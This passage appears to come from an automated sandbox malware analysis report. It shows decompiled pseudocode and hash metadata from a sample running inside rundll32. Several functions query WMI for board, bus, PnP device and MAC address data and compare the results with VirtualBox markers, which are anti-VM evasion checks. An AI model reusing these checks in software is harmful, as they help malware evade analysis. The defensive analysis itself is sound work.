				void* _t75;
				void* _t93;
				long long _t117;
				long long _t119;
				void* _t122;
				intOrPtr* _t131;
				long long _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t168;
				long long _t173;

				_t156 = __rsi;
				_t159 = _t160 - 0x47;
				_t161 = _t160 - 0x90;
				r15d = 0;
				 *((long long*)(_t159 + 0x7f)) = _t173;
				 *((long long*)(_t159 - 0x19)) = _t173;
				 *((long long*)(_t159 + 0x77)) = _t173;
				_t75 = E0000021E21EF30211C0(_t74, _t159 + 0x7f, _t159 - 0x19, __rsi); // executed
				if (_t75 == 0) goto 0xf301f9a7;
				 *((long long*)(_t161 + 0x88)) = _t156;
				 *((long long*)(_t161 + 0x80)) = __rdi;
				 *((long long*)(_t161 + 0x78)) = __r12;
				 *((long long*)(_t161 + 0x70)) = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xf301f805;
				if (__rax == 0) goto 0xf301f7fc;
				 *((long long*)(_t161 + 0x28)) = _t159 + 0x77;
				_t14 = _t173 + 0x30; // 0x30
				r9d = _t14;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f))));
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0xa0))() >= 0) goto 0xf301f7fc;
				r14d = r15d;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				_t117 =  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19))));
				 *((intOrPtr*)(_t117 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xf301f81b;
				__imp__#6();
				if (r14d == 0) goto 0xf301f994;
				_t131 =  *((intOrPtr*)(_t159 + 0x77));
				 *((long long*)(_t159 + 0x6f)) = _t173;
				 *((intOrPtr*)(_t159 + 0x67)) = r15d;
				 *(_t159 - 0x11) = r15w;
				 *((long long*)(_t159 - 0xf)) = _t117;
				 *((long long*)(_t159 - 7)) = _t117;
				 *((intOrPtr*)(_t159 + 1)) = 0;
				 *((short*)(_t159 + 5)) = 0;
				if (_t131 == 0) goto 0xf301f974;
				 *((long long*)(_t161 + 0x20)) = _t159 + 0x67;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t131 + 0x20))();
				if ( *((intOrPtr*)(_t159 + 0x67)) == r15d) goto 0xf301f970;
				 *((long long*)(_t161 + 0x28)) = _t173;
				r8d = 0;
				 *((long long*)(_t161 + 0x20)) = _t173;
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))); // executed
				 *((intOrPtr*)(_t119 + 0x20))();
				if (0 < 0) goto 0xf301f8d7;
				if ( *(_t159 - 0x11) == r12w) goto 0xf301f8d7;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xf301f8cd;
				E0000021E21EF310E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"VirtualBox",  *((intOrPtr*)(_t161 + 0x88)),  *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))), _t168);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				 *(_t159 + 7) = r15w;
				 *((long long*)(_t159 + 0x11)) = _t119;
				 *((long long*)(_t159 + 9)) = _t119;
				r8d = 0;
				asm("movups xmm0, [ebp+0x7]");
				 *((intOrPtr*)(_t159 + 0x19)) = 0;
				 *((short*)(_t159 + 0x1d)) = 0;
				asm("movsd xmm1, [ebp+0x17]");
				asm("movups [ebp-0x11], xmm0");
				 *((long long*)(_t161 + 0x28)) = _t173;
				asm("movsd [ebp-0x1], xmm1");
				 *((long long*)(_t161 + 0x20)) = _t173;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x20))();
				if (0 < 0) goto 0xf301f953;
				if ( *(_t159 - 0x11) == r12w) goto 0xf301f953;
				if (( *(_t159 - 0x11) & 0x00000008) == 0) goto 0xf301f949;
				E0000021E21EF310E5B0(_t122,  *((intOrPtr*)(_t159 - 9)), L"Oracle Corporation",  *((intOrPtr*)(_t161 + 0x88)), _t167, _t168);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x6f)))) + 0x10))();
				if (_t93 != 0) goto 0xf301f970;
				if ( *((intOrPtr*)(_t159 + 0x77)) != 0) goto 0xf301f860;
				goto 0xf301f974;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x77)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x7f)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x19)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t93;
			}

















                                        0x21ef301f730
                                        0x21ef301f735
                                        0x21ef301f73a
                                        0x21ef301f741
                                        0x21ef301f74c
                                        0x21ef301f750
                                        0x21ef301f757
                                        0x21ef301f75b
                                        0x21ef301f762
                                        0x21ef301f768
                                        0x21ef301f777
                                        0x21ef301f77f
                                        0x21ef301f784
                                        0x21ef301f789
                                        0x21ef301f799
                                        0x21ef301f79f
                                        0x21ef301f7a8
                                        0x21ef301f7ae
                                        0x21ef301f7b3
                                        0x21ef301f7bd
                                        0x21ef301f7c2
                                        0x21ef301f7c2
                                        0x21ef301f7c9
                                        0x21ef301f7d1
                                        0x21ef301f7dd
                                        0x21ef301f7e3
                                        0x21ef301f7e9
                                        0x21ef301f7f0
                                        0x21ef301f7f3
                                        0x21ef301f7f6
                                        0x21ef301f7ff
                                        0x21ef301f810
                                        0x21ef301f815
                                        0x21ef301f82b
                                        0x21ef301f831
                                        0x21ef301f837
                                        0x21ef301f83b
                                        0x21ef301f83f
                                        0x21ef301f844
                                        0x21ef301f848
                                        0x21ef301f84c
                                        0x21ef301f84f
                                        0x21ef301f856
                                        0x21ef301f867
                                        0x21ef301f873
                                        0x21ef301f876
                                        0x21ef301f87d
                                        0x21ef301f88b
                                        0x21ef301f897
                                        0x21ef301f89a
                                        0x21ef301f89f
                                        0x21ef301f8a2
                                        0x21ef301f8a7
                                        0x21ef301f8ae
                                        0x21ef301f8b4
                                        0x21ef301f8c1
                                        0x21ef301f8c9
                                        0x21ef301f8d1
                                        0x21ef301f8e1
                                        0x21ef301f8e6
                                        0x21ef301f8f1
                                        0x21ef301f8f5
                                        0x21ef301f8f8
                                        0x21ef301f8fc
                                        0x21ef301f8ff
                                        0x21ef301f903
                                        0x21ef301f908
                                        0x21ef301f90c
                                        0x21ef301f911
                                        0x21ef301f919
                                        0x21ef301f91e
                                        0x21ef301f923
                                        0x21ef301f92a
                                        0x21ef301f930
                                        0x21ef301f93d
                                        0x21ef301f945
                                        0x21ef301f94d
                                        0x21ef301f95a
                                        0x21ef301f95f
                                        0x21ef301f968
                                        0x21ef301f96e
                                        0x21ef301f977
                                        0x21ef301f981
                                        0x21ef301f98b
                                        0x21ef301f98e
                                        0x21ef301f9a6

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocClearFreeUninitializeVariantwcsstr$Initialize
                                        • String ID: Manufacturer$Oracle Corporation$Product$SELECT * FROM Win32_BaseBoard$VirtualBox$WQL
                                        • API String ID: 1018877641-1142199694
                                        • Opcode ID: 7dd37225c9dd0c544af356bceac6ffd6933853081eb258d3ccf53a44c397afed
                                        • Instruction ID: 79c4f8263c7ffaab95900e60461701efe8b8adc615a80e5abefc771375332eb6
                                        • Opcode Fuzzy Hash: 7dd37225c9dd0c544af356bceac6ffd6933853081eb258d3ccf53a44c397afed
                                        • Instruction Fuzzy Hash: CF81E136605B80CAEB10EF79E8543AE33F4FB94B88F0585169E4957E68DF38C55AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301F520 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 142memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 26%
                                        			E0000021E21EF301F520(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, long long __r15, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t99;
				intOrPtr* _t112;
				long long _t133;
				long long _t134;
				void* _t145;

				_t134 = __rsi;
				_a24 = _t133;
				_v88 = _t133;
				_a16 = _t133;
				_t54 = E0000021E21EF30211C0(_t53,  &_a24,  &_v88, __rsi); // executed
				if (_t54 == 0) goto 0xf301f723;
				_v24 = __rbx;
				_v32 = _t134;
				_v40 = __r14;
				_v48 = __r15;
				__imp__#2();
				_t135 = __rax;
				__imp__#2();
				r15d = 1;
				_t102 = __rax;
				r14d = r15d;
				if (__rax == 0) goto 0xf301f5e4;
				if (__rax == 0) goto 0xf301f5db;
				_v96 =  &_a16;
				_t13 = _t133 + 0x30; // 0x31
				r9d = _t13;
				_v104 = _t133;
				_t144 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301f5db;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xf301f5f2;
				__imp__#6();
				if (r14d == 0) goto 0xf301f70b;
				_t112 = _a16;
				_a32 = _t133;
				_a8 = 0;
				if (_t112 == 0) goto 0xf301f6eb;
				_v104 =  &_a8;
				r8d = r15d; // executed
				 *((intOrPtr*)( *_t112 + 0x20))();
				if (_a8 == 0) goto 0xf301f6dc;
				_v96 = _t133;
				r8d = 0;
				_v104 = _t133;
				_t99 =  *_a32; // executed
				if ( *((intOrPtr*)(_t99 + 0x20))() < 0) goto 0xf301f6c3;
				_t60 = _v80 & 0x0000ffff;
				if (_t60 == r15w) goto 0xf301f6c3;
				if ((_t60 & 0x00000008) == 0) goto 0xf301f6b9;
				E0000021E21EF310E5B0(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
				if (_t99 != 0) goto 0xf301f6b7;
				E0000021E21EF310E5B0(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
				if (_t99 != 0) goto 0xf301f6b7;
				E0000021E21EF310E5B0(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
				if (_t99 == 0) goto 0xf301f6b9;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0xf301f620;
				goto 0xf301f6e0;
				if (1 != 3) goto 0xf301f6eb;
				_t74 =  ==  ? r15d : 0;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				_t68 =  ==  ? r15d : 0;
				return  ==  ? r15d : 0;
			}




















                                        0x21ef301f520
                                        0x21ef301f534
                                        0x21ef301f538
                                        0x21ef301f53c
                                        0x21ef301f540
                                        0x21ef301f547
                                        0x21ef301f54d
                                        0x21ef301f559
                                        0x21ef301f55e
                                        0x21ef301f563
                                        0x21ef301f568
                                        0x21ef301f575
                                        0x21ef301f578
                                        0x21ef301f57e
                                        0x21ef301f584
                                        0x21ef301f587
                                        0x21ef301f58d
                                        0x21ef301f592
                                        0x21ef301f59c
                                        0x21ef301f5a1
                                        0x21ef301f5a1
                                        0x21ef301f5a8
                                        0x21ef301f5b0
                                        0x21ef301f5bc
                                        0x21ef301f5c2
                                        0x21ef301f5c8
                                        0x21ef301f5d2
                                        0x21ef301f5d5
                                        0x21ef301f5de
                                        0x21ef301f5e7
                                        0x21ef301f5ec
                                        0x21ef301f5fa
                                        0x21ef301f600
                                        0x21ef301f606
                                        0x21ef301f60c
                                        0x21ef301f612
                                        0x21ef301f627
                                        0x21ef301f633
                                        0x21ef301f636
                                        0x21ef301f63c
                                        0x21ef301f64a
                                        0x21ef301f656
                                        0x21ef301f659
                                        0x21ef301f660
                                        0x21ef301f668
                                        0x21ef301f66a
                                        0x21ef301f672
                                        0x21ef301f676
                                        0x21ef301f683
                                        0x21ef301f68b
                                        0x21ef301f698
                                        0x21ef301f6a0
                                        0x21ef301f6ad
                                        0x21ef301f6b5
                                        0x21ef301f6bd
                                        0x21ef301f6ca
                                        0x21ef301f6d4
                                        0x21ef301f6da
                                        0x21ef301f6e3
                                        0x21ef301f6e7
                                        0x21ef301f6ee
                                        0x21ef301f6f8
                                        0x21ef301f702
                                        0x21ef301f705
                                        0x21ef301f710
                                        0x21ef301f722

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                                        • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                                        • API String ID: 2365594256-2399075642
                                        • Opcode ID: eab667d158c5d7a65a7e10aacd595b8ad7012d16ea1a653bf5cbc84b599de52f
                                        • Instruction ID: 9c97882a8659884d0ea49dc45d3091b37ac8e9aaecabae7546611d7f90901b5b
                                        • Opcode Fuzzy Hash: eab667d158c5d7a65a7e10aacd595b8ad7012d16ea1a653bf5cbc84b599de52f
                                        • Instruction Fuzzy Hash: 15512876300A5086EF109F25E8842DE67F4FBA8B98F1A4616EE4E47F69DF38C456C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301F120 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 20%
                                        			E0000021E21EF301F120(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t49;
				void* _t50;
				void* _t63;
				void* _t86;
				intOrPtr* _t95;
				long long _t115;
				void* _t126;
				long long _t131;

				_t115 = __rsi;
				r15d = 0;
				_a16 = _t131;
				_v88 = _t131;
				_a24 = _t131;
				_t50 = E0000021E21EF30211C0(_t49,  &_a16,  &_v88, __rsi); // executed
				if (_t50 == 0) goto 0xf301f2ec;
				_v32 = _t115;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xf301f1ea;
				if (__rax == 0) goto 0xf301f1e1;
				_v96 =  &_a24;
				_t13 = _t131 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0xf301f1e1;
				r14d = r15d;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xf301f1fd;
				__imp__#6();
				if (r14d == 0) goto 0xf301f2dc;
				_t95 = _a24;
				_a32 = _t131;
				_a8 = r15d;
				if (_t95 == 0) goto 0xf301f2b8;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t95 + 0x20))();
				if (_a8 == r15d) goto 0xf301f2b8;
				_v96 = _t131;
				r8d = 0;
				_v104 = _t131;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xf301f29d;
				if (_v80 != 8) goto 0xf301f293;
				E0000021E21EF310E5B0(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
				_t63 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t63 != 0) goto 0xf301f2b8;
				if (_a24 != 0) goto 0xf301f230;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t63;
			}





















                                        0x21ef301f120
                                        0x21ef301f12c
                                        0x21ef301f137
                                        0x21ef301f13b
                                        0x21ef301f142
                                        0x21ef301f146
                                        0x21ef301f14d
                                        0x21ef301f153
                                        0x21ef301f15f
                                        0x21ef301f164
                                        0x21ef301f169
                                        0x21ef301f16e
                                        0x21ef301f17e
                                        0x21ef301f184
                                        0x21ef301f18d
                                        0x21ef301f193
                                        0x21ef301f198
                                        0x21ef301f1a2
                                        0x21ef301f1a7
                                        0x21ef301f1a7
                                        0x21ef301f1ae
                                        0x21ef301f1c2
                                        0x21ef301f1c8
                                        0x21ef301f1ce
                                        0x21ef301f1d8
                                        0x21ef301f1db
                                        0x21ef301f1e4
                                        0x21ef301f1f2
                                        0x21ef301f1f7
                                        0x21ef301f20a
                                        0x21ef301f210
                                        0x21ef301f214
                                        0x21ef301f218
                                        0x21ef301f21f
                                        0x21ef301f225
                                        0x21ef301f237
                                        0x21ef301f243
                                        0x21ef301f246
                                        0x21ef301f24d
                                        0x21ef301f257
                                        0x21ef301f263
                                        0x21ef301f266
                                        0x21ef301f273
                                        0x21ef301f27a
                                        0x21ef301f287
                                        0x21ef301f28f
                                        0x21ef301f297
                                        0x21ef301f2a4
                                        0x21ef301f2a9
                                        0x21ef301f2b2
                                        0x21ef301f2bf
                                        0x21ef301f2c9
                                        0x21ef301f2d3
                                        0x21ef301f2d6
                                        0x21ef301f2eb

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                                        • API String ID: 1998430482-342862491
                                        • Opcode ID: d51a4c34e003bd172069b5f7fe8728b28793e16d5841d0451cccac60e24534ca
                                        • Instruction ID: 2ec313f1a6820813ce4e3e861a239ade34a2a6716d2d983f7506d51157951f56
                                        • Opcode Fuzzy Hash: d51a4c34e003bd172069b5f7fe8728b28793e16d5841d0451cccac60e24534ca
                                        • Instruction Fuzzy Hash: 0A512476301B5086EB10DF25E89869E67A4F798F98F465216EE4E43F68DF38C48AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301EA40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 130memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 20%
                                        			E0000021E21EF301EA40(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t51;
				void* _t52;
				signed char _t58;
				void* _t66;
				void* _t90;
				intOrPtr* _t99;
				long long _t119;
				void* _t130;
				long long _t135;

				_t119 = __rsi;
				r15d = 0;
				_a24 = _t135;
				_v88 = _t135;
				_a16 = _t135;
				_t52 = E0000021E21EF30211C0(_t51,  &_a24,  &_v88, __rsi); // executed
				if (_t52 == 0) goto 0xf301ec15;
				_v32 = _t119;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xf301eb0a;
				if (__rax == 0) goto 0xf301eb01;
				_v96 =  &_a16;
				_t13 = _t135 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xf301eb01;
				r14d = r15d;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xf301eb1d;
				__imp__#6();
				if (r14d == 0) goto 0xf301ec05;
				_t99 = _a16;
				_a32 = _t135;
				_a8 = r15d;
				if (_t99 == 0) goto 0xf301ebe5;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t99 + 0x20))();
				if (_a8 == r15d) goto 0xf301ebe1;
				_v96 = _t135;
				r8d = 0;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0xf301ebc4;
				_t58 = _v80 & 0x0000ffff;
				if (_t58 == r12w) goto 0xf301ebc4;
				if ((_t58 & 0x00000008) == 0) goto 0xf301ebba;
				E0000021E21EF310E5B0(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
				_t66 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t66 != 0) goto 0xf301ebe1;
				if (_a16 != 0) goto 0xf301eb50;
				goto 0xf301ebe5;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t66;
			}






















                                        0x21ef301ea40
                                        0x21ef301ea4c
                                        0x21ef301ea57
                                        0x21ef301ea5b
                                        0x21ef301ea62
                                        0x21ef301ea66
                                        0x21ef301ea6d
                                        0x21ef301ea73
                                        0x21ef301ea7f
                                        0x21ef301ea84
                                        0x21ef301ea89
                                        0x21ef301ea8e
                                        0x21ef301ea9e
                                        0x21ef301eaa4
                                        0x21ef301eaad
                                        0x21ef301eab3
                                        0x21ef301eab8
                                        0x21ef301eac2
                                        0x21ef301eac7
                                        0x21ef301eac7
                                        0x21ef301eace
                                        0x21ef301eae2
                                        0x21ef301eae8
                                        0x21ef301eaee
                                        0x21ef301eaf8
                                        0x21ef301eafb
                                        0x21ef301eb04
                                        0x21ef301eb12
                                        0x21ef301eb17
                                        0x21ef301eb2a
                                        0x21ef301eb30
                                        0x21ef301eb34
                                        0x21ef301eb38
                                        0x21ef301eb3f
                                        0x21ef301eb45
                                        0x21ef301eb57
                                        0x21ef301eb63
                                        0x21ef301eb66
                                        0x21ef301eb6d
                                        0x21ef301eb77
                                        0x21ef301eb83
                                        0x21ef301eb86
                                        0x21ef301eb93
                                        0x21ef301eb95
                                        0x21ef301eb9d
                                        0x21ef301eba1
                                        0x21ef301ebae
                                        0x21ef301ebb6
                                        0x21ef301ebbe
                                        0x21ef301ebcb
                                        0x21ef301ebd0
                                        0x21ef301ebd9
                                        0x21ef301ebdf
                                        0x21ef301ebe8
                                        0x21ef301ebf2
                                        0x21ef301ebfc
                                        0x21ef301ebff
                                        0x21ef301ec14

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                                        • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                                        • API String ID: 1998430482-232164535
                                        • Opcode ID: 4b5c6f56fad445e568fe4dacea64a3ffc38b5697cafface0be3d1801f2c824c5
                                        • Instruction ID: 2b357343cc76894d76cbeef952380a7c6f0f9261f51962b3f1420d2e95cc6a8e
                                        • Opcode Fuzzy Hash: 4b5c6f56fad445e568fe4dacea64a3ffc38b5697cafface0be3d1801f2c824c5
                                        • Instruction Fuzzy Hash: B5511536301B5086EF10AF25E8882AE67B4F798F98F165516EE5E43F68DF38C486C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301E6A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction ID: 21bb5b58469b39f6ea06ed2f92175738282debe5da5185f798e1cc951db625b4
                                        • Opcode Fuzzy Hash: e31e6983fb8e730e6e55048d195789d7b53ff78273e7e147f474fbb06369237e
                                        • Instruction Fuzzy Hash: D9313C3561498081FE219B28EC4A7EB63B1FFE9308F4241159E9943AA5EE3DC15BCB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                                        • String ID: %ProgramW6432%
                                        • API String ID: 3127241168-1092591020
                                        • Opcode ID: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction ID: 98925f3dc86b073a360ed293c552454bb62e32664b62a2c39c8fab27c3bca477
                                        • Opcode Fuzzy Hash: f4e446950c117aaa7a5b22abb95a2542fa7d5a0f251ada8163812decc7223617
                                        • Instruction Fuzzy Hash: 29214C7121498081FE709B24EC5A7DB63B1FBE9748F8241129E4D47DA5DE3DC157CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3111DF0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 40%
                                        			E0000021E21EF3111DF0(void* __ecx, void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, char _a24, intOrPtr _a40) {
				long long _v16;
				intOrPtr _v24;
				void* _t12;
				intOrPtr* _t34;
				long long _t35;
				intOrPtr* _t38;

				_t34 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if (__r8 != 0) goto 0xf3111e20;
				_t12 = E0000021E21EF3118984(__rax);
				 *__rax = 0x16;
				E0000021E21EF3111BC8(_t12);
				goto 0xf3111ea0;
				E0000021E21EF3111D90(__rax, __rbx, __r8, __r9, __rcx);
				_t38 = _t34;
				if (_t34 == 0) goto 0xf3111e70;
				_t35 =  &_a24;
				_v16 = _t35;
				_v24 = _a40;
				CreateThread(??, ??, ??, ??, ??, ??); // executed
				if (_t35 != 0) goto 0xf3111eb0;
				E0000021E21EF3118914(GetLastError(), _t35, _t38);
				if (_t38 == 0) goto 0xf3111e9d;
				if ( *((intOrPtr*)(_t38 + 0x10)) == 0) goto 0xf3111e86;
				CloseHandle(??);
				if ( *((intOrPtr*)(_t38 + 0x18)) == 0) goto 0xf3111e95;
				FreeLibrary(??);
				return E0000021E21EF3124EE0(_t35, _t38);
			}









                                        0x21ef3111df0
                                        0x21ef3111df0
                                        0x21ef3111df5
                                        0x21ef3111e07
                                        0x21ef3111e09
                                        0x21ef3111e0e
                                        0x21ef3111e14
                                        0x21ef3111e1b
                                        0x21ef3111e26
                                        0x21ef3111e2b
                                        0x21ef3111e31
                                        0x21ef3111e33
                                        0x21ef3111e3b
                                        0x21ef3111e51
                                        0x21ef3111e55
                                        0x21ef3111e61
                                        0x21ef3111e6b
                                        0x21ef3111e75
                                        0x21ef3111e7e
                                        0x21ef3111e80
                                        0x21ef3111e8d
                                        0x21ef3111e8f
                                        0x21ef3111eaf

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: b51c7cb60d147e5c0669e2db15bcc3ed022d0b02608c378374a75aaf55dc55d9
